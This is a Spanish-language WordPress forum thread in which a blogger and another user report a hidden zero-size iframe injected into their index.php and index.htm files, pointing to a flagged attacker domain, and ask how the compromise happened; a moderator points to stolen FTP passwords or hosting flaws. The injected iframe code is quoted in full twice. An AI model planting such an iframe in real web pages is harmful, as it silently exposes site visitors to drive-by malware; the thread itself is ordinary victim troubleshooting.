Foro WordPress Ayuda entre usuarios

Acerca de este hilo

• Publicado hace 1 año
• Por guardafaro
• Última respuesta de ramon6200
• Este Hilo está sin resolver
• Suscribirse a este hilo
• RSS feed de este hilo

Tags

1. 

   guardafaro
   

   5.0
   Antiguedad: Oct 2009
   Mensajes: 109

   offline

   Agradecimientos:36

    

   
   Publicado hace 1 año
   #

   Este lunes al abrir mi blog El guardián del faro, me encontré con el siguiente mensaje de error de PHP:

   Parse error: syntax error, unexpected '?' in /home/rutaxxx/rutaxxx/index.php on line 18

   Revisé el archivo index.php de la instalación de WP y, efectivamente, en la última línea (18) que cierra el php se encontraba incrustado el siguiente código:

   ?< html >< body >< iframe src="http://vsmd.kz/td/index.php"  width="0" height="0" frameborder="0" >< /iframe >< /body >< /html > >

   
   

   Una vez eliminada y subido el archivo volví a recuperar mi blog.
   El sitio web indicado en esa URL está marcado como un sitio atacante.
   Tengo dudas razonables de que hayan podido violentar algunas de mis claves, particularmente del FTP, porque suelo usar claves fuertes.
   Sin embargo, ya he cambiado todas las claves por otras, y remozado el archivo wp-config.php que antes solo tenía la secret-key, colocando ahora las cuatro llaves actuales.

   No logro entender lo que ese código pretendían, pues mi blog no es de una particular relevancia. Mi interrogante es ¿cómo lograron colocar ese código malicioso en mi archivo index.php de WP? Porque si no sé como lo hicieron dificilmente puedo tapar brechas y evitar que ocurra.

   ¿Alguien tiene idea de cómo pudieron hacerlo y de cómo evitarlo?
2. 

   Lluna
   

   Moderador
   Antiguedad: Jun 2009
   Mensajes: 859

   offline

   Agradecimientos:133

    

   
   Publicado hace 1 año
   #

   Si tienes la ultima versión de Wordpress y ningún plugin "raro" lo más probable es que sea por FTP, aunque como se vió hace algún tiempo algunas configuraciones de hosting eran vulnerables

   Saludos!
3. 

   guardafaro
   

   5.0
   Antiguedad: Oct 2009
   Mensajes: 109

   offline

   Agradecimientos:36

    

   
   Publicado hace 1 año
   #

   Sí, no lo mencioné, pero tengo la última versión de WP y no he añadido ningún plugin. Todos los que tengo llevan mucho tiempo.
   Gracias Lluna
4. 

   Lluna
   

   Moderador
   Antiguedad: Jun 2009
   Mensajes: 859

   offline

   Agradecimientos:133

    

   
   Publicado hace 1 año
   #

   Entonces te quedan 2, que te robaran las claves de FTP ( o bien por fuerza bruta ) o que el setup del hosting tenga un fallo.

   Saludos!
5. 

   ramon6200
   

   1.0
   Antiguedad: Jun 2010
   Mensajes: 1

   offline

   Agradecimientos:0

    

   
   Publicado hace 1 año
   #

   Hola a todos. Yo también he recibido este ataque. En concreto, alguien ha añadido en las páginas index.htm y index.php después de la etiqeta <body> esta linea:<iframe src="http://vsmd.kz/td/index.php" width="0" height="0" frameborder="0"></iframe>
   He podido comprobar que esta linea de código no está en mi código fuente. En google ya lo tienen localizado. Para solucionarlo, usar el mismo método que guardafaro.
   Podeis ver la info recopilada por google en: http://www.google.com/safebrowsing/diagnostic?site=http://vsmd.kz/td/index.php&hl=es